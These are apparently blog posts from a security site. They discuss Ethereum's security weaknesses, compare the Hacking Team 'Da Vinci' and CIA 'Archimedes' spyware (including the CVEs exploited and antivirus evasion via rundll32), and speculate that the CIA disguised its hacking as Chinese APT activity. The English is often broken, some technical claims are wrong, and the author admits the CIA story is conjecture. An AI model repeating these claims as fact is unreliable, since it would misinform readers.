As of 6 February 2016, there are 15.2 million bitcoins circulation of a capped total of 21 million.

Bitcoins current status: As of today 11th May 2017
  • Total volume: 1800 Billion of dollars
  • 4 days exchange volume equal to 30 Billion of dollars

Block chain space Radical changes on 2017

In 2017 Microsoft announced their participation in the newly formed Enterprise Ethereum Alliance. Joining them are also companies such as Intel, J.P. Morgan, BNY Mellon, BP, ING, Thomson Reuters and blockchain startups. In general, my idea on key word “Ethereum” only focus on security incident. Sounds like that I am not suggest anyone to create Ethereum to let hackers get away your money.

Quote:  “In general, the Ethereum community is on board with the notion that we do not have to do things exactly the way that things are done in other crypto communities,”  -shortcut from Bloomberg Business week.

As a matter of fact, new technology has technical limitation not the 1st day we heard, but it has the mature model finally, right?  So I am not keen to my stubborn to say not suggest to use. Perhaps a positive discussion might provide more positive idea in this regard.

High Level understand of Ethereum

Ethereum is an open-source, public, blockchain-based distributed computing platform featuring smart contract (scripting) functionality.

Platform‎: ‎x86, ARM

Initial release‎: ‎30 July 2015

Written in‎: ‎C++‎, ‎Go‎, ‎Rust

Operating system‎: ‎Clients available for Linux, ‎Windows‎, ‎macOS‎, ‎POSIX‎, ‎Raspbian

Technical weakness on security viewpoint

Programming language: C++

Security problems with C and C++ programs is hard to avoid the following issue:

  • buffer overflow attack
  • Integer problems in C/C++
  • File I/O risks
  • Temporary files / a C++ TOCTOU vulnerability
  • Unicode bug‎

Programming language: Go

How are blockchain application developed by “GO”. What is “Go”? “Go” is a free and open source created at Google in 2007 by Robert Griesemer, Rob Pike, and Ken Thompson . Like other programming language, this programming language contain their design limitation. The vulnerability found this year was shown that the “Go” SSH library (x/crypto/ssh) by default does not verify host keys, facilitating man-in-the-middle attacks. Default behavior changed in commit e4e2799 to require explicitly registering a hostkey verification mechanism.

Programming language: Rust

Rust is a general purpose programming language sponsored by Mozilla Research. It is designed to be a “safe, concurrent, practical language”, supporting functional and imperative-procedural paradigms. Rust is syntactically similar to C++, but is designed for better memory safety while maintaining performance. Rust only panics from integer overflow when in debug mode. So it looks that this programming languages suitable for developers build block chain system application.

Remark: Developer Analyst firm Redmonk charted Rust’s move on the Github rankings from 46 to 18.

Modern cyber technology crisis

Ransomware attack is the 1st priority of concern:

Ransomware (Wannacry) attack hits 99 countries with UK hospitals among targets yesterday. As we know the specifics attack are leveraging a Windows exploit harvested from the NSA called EternalBlue ( –  the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server). As a result it trigger the one to many attacks within the internal network.  Since it relies on SMB so it spread out in extremely fast way. We are not going to discuss this incident today.

The reflections of this incident let us know the design weakness can kill the system within 1 minutes and broadcast the attack to neighbor.  Be reminded that even though block chain or Ethereum technology network are built by group. It is a star topology network. A benefits for system and network resilience. However it increase the inherent risk.

Peer-to-peer communications between nodes running Ethereum clients run using the underlying ÐΞVp2p Wire Protocol. It is very secure. However if a trust client being compromised. From techincal point of view, hacker will more easy to infiltrate into it. Besides, the objective of ransomware  target  for ransom (money).  If the victim workstation (Ethereum client) or mobile phone (Ethereum client) was compromised by ransom (whole hard drive encrypted). A  high possibility to pay for the ransom otherwise he will lost more money.

Observation

As said, Ethereum deploy a high standard of secure protocol ( ÐΞVp2p Wire Protocol). However you can drill down in different area see whether can find out the design limitation.  For instance a well known vulnerability. A Java Debug Wire Protocol remote code execution. The problem was that JDWP ( Java Debug Wire Protocol) is one layer within the Java Platform Debugger Architecture (JPDA). JDWP does not use any authentication and could be abused by an attacker to execute arbitrary code on the affected server. Any impact here!

But my concern is on fast synchronization process. In the mean time I am still analysis what is the possibility to fool the remote peer on GetNodeData step. For more detail, please refer below specification.

Fast synchronization (PV63) specification:

GetNodeData [+0x0d, hash_0: B_32, hash_1: B_32, …] Require peer to return a NodeData message. Hint that useful values in it are those which correspond to given hashes.

NodeData [+0x0e, value_0: B, value_1: B, …] Provide a set of values which correspond to previously asked node data hashes from GetNodeData. Does not need to contain all; best effort is fine. If it contains none, then has no information for previous GetNodeData hashes.

GetReceipts [+0x0f, hash_0: B_32, hash_1: B_32, …] Require peer to return a Receipts message. Hint that useful values in it are those which correspond to blocks of the given hashes.

Receipts [+0x10, [receipt_0, receipt_1], …] Provide a set of receipts which correspond to previously asked in GetReceipts.

Summary:

Our discussion stop here today. I will provide more update in this regard. Thank you.

Reference:

Part 2:Blockchain technology situation – Malware join to bitcoin mining

Part 2:Blockchain technology situation – Malware join to bitcoin mining

Part 1:Blockchain technology situation – A Tales of Two Cities

http://www.antihackingonline.com/network-protocol-topology-standard/part-1blockchain-technology-situation-a-tales-of-two-cities/

 

Who spying on me? Da Vinci or Archimedes?

Preface:

Archimedes’ principle is a law of physics fundamental to fluid mechanics.

Leonardo Da vinci  is widely considered one of the most diversely talented individuals ever to have lived.

Since they are the famous scientists. They dedicate their inventions to the world. But we known the infamous tools in cyber world for the government surveillance program. The most famous eavesdropping feature type of malware. Those surveillance tools make use of similar naming convention. From general point of view, it looks that it is not respect of these two great scientists!

About  Da vinci  Spy tools

A powerful spy software developed by Italian hack team, the tool benefits to track a person’s calls and other communications in real-time.  This tools only sell to law enforcement or government agent. Italian Hacking Team was hacked by other hacker group on 2015. More than 400GB of data, including source code, internal documents and emails that could reveal the identity of customers display on embedded torrent file share link. A rumors were told that Italian hack team blamed their customer unethical collect their technology and hack them.

About Archimedes tool

We all known tool used by the CIA named “Archimedes”  open to the world through WikiLeaks on 5th May 2017. Archimedes developed by CIA engineering development Group. The project code so called UMBRAGE project.  It is a interested project code name. The definition of Umbrage means offense; annoyance; displeasure: to feel umbrage at a social snub; to give umbrage to someone; to take umbrage at someone’s rudeness.

Technology

 Da vinci  Spy tool

Da vinci spy tool relies on JAR (Java ARchive) , Microsoft Office and Adobe Flash Player design limitation as a infection media to fulfill their remote control system (RCS) criteria (see below). A more advance technique of tool easy to fool the cyber defense mechanism since this is a unknown attack (zero day) and therefore it will be more easily to spread out the spyware fulfill their objective.

1. Self-signed JAR
2. CVE-2012-4167: Integer overflow in Adobe Flash Player
3. CVE-2010-3333: Stack-based buffer overflow in Microsoft Office
4. CVE-2012-5054: Integer overflow in the copyRawDataTo method in the Matrix3D class in Adobe Flash Player
5. CVE-2012-1682: Unspecified vulnerability in the Java Runtime Environment (JRE)
6. CVE-2013-0633: Buffer overflow in Adobe Flash Player

Archimedes

Archimedes is an update to Fulcrum 0.6.1. The design objective of Fulcrum. Fulcrum will direct a target machine’s HTTP client traffic to the URL of the attacker’s choice. The technique involves ARP Spoofing to Get In the Middle and HTTP Traffic Injection. The simple conceptual idea shown in below picture.

Archimedes (Fulcrum 0.6.2) focus windows OS with high flexibility. The attacker can execute Fulcrum as an EXE with Compiled Parameters. In order to avoid anti-virus program protection .The remote attacker can run as DLL with rundll32.exe with CommandLine Parameters. The tool itself is not sophisticated. Attacker can easy to get rid following files (f32.exe,f32.dll,fs32.exe,fs32.dll,f.cfg and f.log). The normal computer user do not know what is happen.

Capability and Flexibility

Da vinci  Spy tool:

Capability: small footprint,  unknown vulnerability (zero day)

Flexibility: Antivirus program not easy to detect until vulnerabilities found by vendor

Archimedes :

Capability: small footprint,  similar normal application program service daemon

Flexibility: Antivirus program not easy to detect until vulnerabilities found by vendor

Similarity

Both spy tools (Da vinci  &  Archimedes (Fulcrum 0.6.2))are using inline hooking technique (see below).

However Archimedes (Fulcrum 0.6.2) looks develop infiltration technique from layer 2. For instance ARP cache poisoning.  Both spy tools entry point (infiltration) looks have differences! Da vinci more focus on layer 7 (application) and Archimedes run on layer 2. Seems it is hard to proof the integrity of the rumors (Italian hack team blamed their customer unethical collect their technology and hack them). But it is not the absolute answer. Let’s keep our eye open on wiki-leaks to know more!

 

Reference:

https://wikileaks.org/vault7/#Archimedes

 

Proof of idea! Who bear unredressed injustice APT activities in 2013.

Wiki released confidential document on 28th April, 2017, the details is exposed how government enforcement agency (CIA) counterfeit Russian and Chinese cyber activities. We receive the basic understanding of the Scribbles . To be honest, it is common that when government agency take the criminal action. However of this confidential information exposed. My reflections drive me to review my former written articles on other discussion forum during 16th April 2016. I was question that engage the investigation on Advanced Persistence threat (APT) might mislead the direction of the result. Their mechanism contains many shadow nodes. The shadow nodes located in different areas and countries. It can take this advantage and convert as political tool. The overall idea to me on this issue, I can do a scenario replay to assembly the story. Since this is only my speculation and imagination. As a matter of fact, it looks with high possibility. If you are interest, please go ahead to read more.

The story given out from my memories, it is talking about 4 years ago. The senior person (owner) of a consulting company email account was hacked. The security guru found that there is a Advanced Persistence threat (APT) activities given by China. A rumours were told that the people who found this so called Advanced Persistence threat (APT) is the anonymous group. This powerful under ground group found out this incident and intend to provides hints and finger print let the security consultant found out the truth. My personal opinion is that such incident might contained some shadow node. Also it is easy to counterfeit the attack. Today it looks that the secret information exposed by Wiki leak provides more possible factors. At the same time it make people queries the result in 2013. At least I am the one who question this result. Below is my speculation how CIA counterfeit the cyber activities let the APAC countries especially China bare unredressed injustice causes.

Latest WikiLeaks release shows how the CIA uses computer code to hide the origins of its hacking attacks and ‘disguise them as Russian or Chinese activity’

https://wikileaks.org/vault7/?marble#Marble

Recap my discussion details on 16th April 2016

An unauthorized person gains access to a network and stays there undetected for a long period of time. Cyber security terminology so called APT attack. APT style attack confused security experts. Their mechanism contains many shadow nodes. The shadow nodes located in different areas and countries. It can take this advantage and convert as political tool. It is a sword. Careerist can blame another country that they are dishonest using internet. Who’s cast a unrighted wrong, believed that attached diagram can provide an idea to you in this regard.

 

 

 

antihackingonline.com